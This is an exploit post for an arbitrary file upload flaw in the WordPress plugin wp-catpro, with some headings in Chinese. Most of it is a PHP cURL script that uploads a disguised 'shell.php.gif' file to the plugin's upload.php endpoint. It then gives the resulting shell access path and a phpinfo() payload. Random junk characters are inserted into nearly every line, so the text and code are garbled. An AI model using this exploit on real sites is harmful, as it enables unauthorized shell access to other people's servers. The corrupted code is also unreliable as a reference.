Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability( v1 ~$ n/ ~2 A% e' G
#-----------------------------------------------------------------------
2 J3 W' d; b8 j/ {, N
( O; W4 o1 X9 X9 c' I! A作者 => Zikou-16 h( [& O" b+ l/ Q, l
邮箱 => zikou16x@gmail.com& U; T( {- v& ^, z5 Q- H' f
测试系统 : Windows 7 , Backtrack 5r3
( d* l4 z1 B! X& M9 }下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip1 q" @% ?, y+ |: x, }# h* d
####
: E$ `7 j3 c6 I8 x" X' U ; h" k( E+ D& ?
#=> Exploit 信息:* r' ]' n* \ W, t1 m
------------------
# |& y6 }. Q: I H9 y; X+ _# 攻击者可以上传 file/shell.php.gif# E D5 m; x7 |# c
# ("jpg", "gif", "png") // Allowed file extensions# ~5 G, K9 _& e
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
* g2 Z: j* \' X9 d4 G2 ?# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
/ L- G5 b- p& G8 l' }------------------; }% R4 w1 |6 D; s+ i, q
9 a, E; L4 D! |3 O, C2 ~8 U) B- Y6 n
#=> Exploit$ x# J# M; T6 T! J
-----------
- D" U" g- X: E6 R- |<?php
9 T' S$ _/ t; a) c p1 I ' T5 U& d! M' ^- H- V1 v: [
$uploadfile="zik.php.gif";, r) d% n% {8 |! ~
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
* Q- W4 Y. q6 r k( Z% d0 acurl_setopt($ch, CURLOPT_POST, true);
; }' Q0 q1 P# f4 t& ncurl_setopt($ch, CURLOPT_POSTFIELDS,8 X8 K3 y# T5 A' b8 R
array('Filedata'=>"@$uploadfile",0 ]# A9 l% }. j7 |" ]* O5 m( O
'folder'=>'/wp-content/uploads/catpro/'));
" T3 ~' u% M' k* V5 scurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);# Z1 Y- R. ?+ Y w
$postResult = curl_exec($ch);
3 t) M8 H. W9 d. f) {. c% ocurl_close($ch);
; t9 v- ~- D# G 7 e/ w- ~* U& f
print "$postResult";& W4 k% O9 ?# K- f" s) J
; r/ C* u, c- w: b% V6 e/ W2 a9 pShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
( b, k2 G' t4 `- r/ W" q5 [ ?>5 i: E+ N: `5 y J+ g& e2 a
<?php
4 a% |+ j H3 O9 |2 X$ i" X! E9 cphpinfo();
5 w: a N/ |2 ?+ L9 m$ E. V?> |